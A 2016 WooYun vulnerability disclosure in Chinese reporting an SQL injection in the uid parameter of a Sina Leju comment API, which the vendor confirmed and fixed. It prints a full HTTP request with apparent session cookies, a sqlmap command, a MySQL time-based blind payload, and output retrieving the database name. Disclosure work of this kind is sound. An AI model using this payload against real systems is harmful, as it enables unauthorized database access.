当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199491

漏洞标题:新浪乐居某接口存在SQL注入

相关厂商:新浪乐居

漏洞作者: null_z

提交时间:2016-04-23 09:23

修复时间:2016-04-25 11:06

公开时间:2016-04-25 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-23: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

SQL注入

详细说明:

注入参数 uid

GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810


漏洞证明:

sqlmap -r 1.txt --dbms=mysql --current-db --technique=T


屏幕快照 2016-04-22 23.10.04.png


---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database:    'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

修复方案:

~~~

版权声明:转载请注明来源 null_z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-24 13:49

厂商回复:

非常感谢您对乐居关注

最新状态:

2016-04-25:漏洞已修复,再次感谢